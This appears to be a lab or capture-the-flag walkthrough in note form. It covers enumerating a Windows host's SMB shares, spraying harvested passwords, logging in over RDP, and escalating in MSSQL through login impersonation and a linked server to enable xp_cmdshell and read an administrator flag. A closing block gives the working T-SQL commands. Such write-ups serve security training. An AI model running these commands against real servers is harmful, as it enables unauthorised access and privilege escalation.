# Recon - Update `/etc/hosts` - Ping test ![[images/Pasted image 20251021085014.png]] - Light nmap scan ![[images/Pasted image 20251021085100.png]] - OS nmap scan - MSSQL also in play ![[images/Pasted image 20251021085143.png]] - Detailed nmap scan with scripts ![[images/Pasted image 20251021085316.png]] - UDP nmap scan ![[images/Pasted image 20251021085424.png]] # Initial Plan 1) Attack SMB 2) Attack MSSQL 3) Finish off with RDP - Ends up being the wrong sequence - SMB > RDP > MSSQL # SMB Enum - Nmap script scan ![[images/Pasted image 20251021085632.png]] - Attempt null session - we get a listing of shares but no RW![[images/Pasted image 20251021085702.png]] - `smbmap` with null session - error ![[images/Pasted image 20251021085826.png]] - `nxc smb` scan with anonymous login - access_denied ![[images/Pasted image 20251021085917.png]] - Attempt brute force with given user simon - user given `pws.list` - we have guest creds for simon ![[images/Pasted image 20251021090106.png]] - Create creds, users, passwords files - Now we have read access to the Home share ![[images/Pasted image 20251021090259.png]] - Spider share ![[images/Pasted image 20251021090636.png]] - User `smbclient` to view files - multiple folders - Only IT has files![[images/Pasted image 20251021090827.png]] - Grab Simon's files ![[images/Pasted image 20251021091027.png]] - `random.txt` has some potential passwords![[images/Pasted image 20251021091505.png]] - Grab Fiona's creds ![[images/Pasted image 20251021090919.png]] - potential Windows passwords for Fiona in `creds.txt`![[images/Pasted image 20251021091543.png]] - Grab all files under John ![[images/Pasted image 20251021091038.png]] - Looks like John's file have some hints![[images/Pasted image 20251021091418.png]] - let's dump all potential passwords into a file for spraying purposes ![[images/Pasted image 20251021091856.png]] - Enum smb with simon again using combined list above - still guest access ![[images/Pasted image 20251021092403.png]] - Enum smb with fiona ![[images/Pasted image 20251021092023.png]] ![[images/Pasted image 20251021092051.png]] - add entry to creds file for fiona - Enum smb with john - guest access with same password as simon (weird??) ![[images/Pasted image 20251021092341.png]] # MSSQL Enum - Try `nxc mssql` scan ![[images/Pasted image 20251021092650.png]] - Try login with fiona using `sqlcmd` - login failed ![[images/Pasted image 20251021092946.png]] - Try login with fiona using `sqsh` - failure with SQL auth ![[images/Pasted image 20251021093047.png]] - success with local account windows auth ![[images/Pasted image 20251021093103.png]] - Several dbs to explore ![[images/Pasted image 20251021093155.png]] - Try `xp_cmdshell` - disabled ![[images/Pasted image 20251021093254.png]] - try to enable - no perms to enable ![[images/Pasted image 20251021093336.png]] - Poke around dbs - Issues with `sqsh` not showing output for commands - HATE `sqsh` - Try more login attempts with `sqlcmd` - I must have the syntax wrong ![[images/Pasted image 20251021095302.png]] - Give up on remote mssql enumeration - Try rdp for local mssql enumeration # RDP Enum - `xfreerdp3` with fiona - we're on the box ![[images/Pasted image 20251021095523.png]] - use Microsoft SQL Server Management Studio ![[images/Pasted image 20251021095630.png]] - MS SSMS GUI not working - Instead, go to powershell and run `sqlcmd -S WIN-HARD` command to open MSSQL - see who we can impersonate ![[images/Pasted image 20251021100255.png]] - verify no sysadmin for current user ![[images/Pasted image 20251021100428.png]] - impersonate john - looks like john is not a sysadmin ![[images/Pasted image 20251021100937.png]] - impersonate simon - errors ![[images/Pasted image 20251021100953.png]] - identify linked servers - server with 0 value is a linked server![[images/Pasted image 20251021101016.png]] - try to login to `LOCAL.TEST.LINKED.SRV` as john - error ![[images/Pasted image 20251021101506.png]] - that's the local server, try with other one ![[images/Pasted image 20251021102028.png]] - now `type` the flag - cannot do this as if, need `xp_cmdshell` ![[images/Pasted image 20251021102625.png]] - enable `xp_cmdshell` ![[images/Pasted image 20251021103102.png]] - use `xp_cmdshell` to type flag - syntax error ![[images/Pasted image 20251021103132.png]] - **syntax** is very important here ![[images/Pasted image 20251021105255.png]] ```mssql -- identify who we can impersonate 1> SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE' 2> GO --output-- -- determine whether impersonateable user has sysadmin privs 1> USE master 2> EXECUTE AS LOGIN = 'john' 3> SELECT SYSTEM_USER 4> SELECT IS_SRVROLEMEMBER('sysadmin') 5> GO --output-- -- identify linked servers 1> SELECT srvname, isremote FROM sysservers 2> GO --output-- -- impersonate user and determine whether they have admin privs on linked server 1) EXECUTE AS LOGIN = 'john' 2> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [LOCAL.TEST.LINKED.SRV] 3> GO --output-- -- enable xp_cmdshell if impersonateable user has admin privs on linked server 1> EXECUTE AS LOGIN = 'john' 2> EXECUTE('EXECUTE sp_configure ''show advanced options'', 1;RECONFIGURE;EXECUTE sp_configure ''xp_cmdshell'', 1;RECONFIGURE') AT [LOCAL.TEST.LINKED.SRV] 3> go -- use xp_cmdshell 1> EXECUTE AS LOGIN = 'john' 2> EXECUTE('xp_cmdshell "type C:\users\administrator\desktop\flag.txt"') AT [LOCAL.TEST.LINKED.SRV] 3> GO --output-- ```